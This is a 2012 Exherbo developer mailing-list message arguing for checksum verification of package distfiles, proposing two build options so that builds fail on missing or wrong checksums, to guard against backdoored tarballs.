[Exherbo-dev] [Exherbo Security] Package Distfile Signing Proposal

Jason A. Donenfeld Jason at zx2c4.com
Thu May 10 15:27:58 UTC 2012

On Thu, May 10, 2012 at 5:02 PM, Ciaran McCreesh
<ciaran.mccreesh at googlemail.com> wrote:
> On Thu, 10 May 2012 14:36:14 +0200
> There's no such thing as "limited security".

Sure there is. There's probably no such thing as "complete security".
Even with checksuming, a hacker could own a developer's box and... etc
etc. Mitigations at any level are important.

In any case, this is a topic for a different thread and probably
different mailing list. May I suggest we continue this conversation on
full-disclosure at lists.grok.org.uk ?

> No, you'd only have to get an rsync mirror.

True, since you can backdoor the ebuilds themselves pretty easily. But
backdoing distfiles requires two pwnages for gentoo.
Right now in Exherbo, we have exheres adequately secure. We don't have
distfiles adequately secure.

> How does that fit in with the standard workflow?
> http://ciaranm.wordpress.com/2010/11/28/exherbo-development-workflow-version-2/

The standard work flow would be the same. There would just be the
additional step of updating the hash value.

> Bear in mind that people might be working on dozens of packages all in
> one go.

I'm presuming that responsible developers already follow best
practices and check the upstream fingerprint on tarballs they develop
on, and are generally conscientious about rogue tarballs.

How about this as a proposal:

In my original letter, I wrote:

> We add two global options for build_options:
> - require-checksum-success: Builds fail if the distfiles have the
> wrong checksums.
> - require-checksum-existance: Build fails if checksum does not exist.

What if we enable this feature, but to begin with, we make
require-checksum-success true, *but make require-checksum-existence
false*. That way, we could start to enable it for packages that are
common backdooring targets, like openssh, vsftpd, etc, without being
entirely disruptive. As Exherbo shifts into the security
consciousness, we could, at some point, enable
require-checksum-existence by default.

More information about the Exherbo-dev mailing list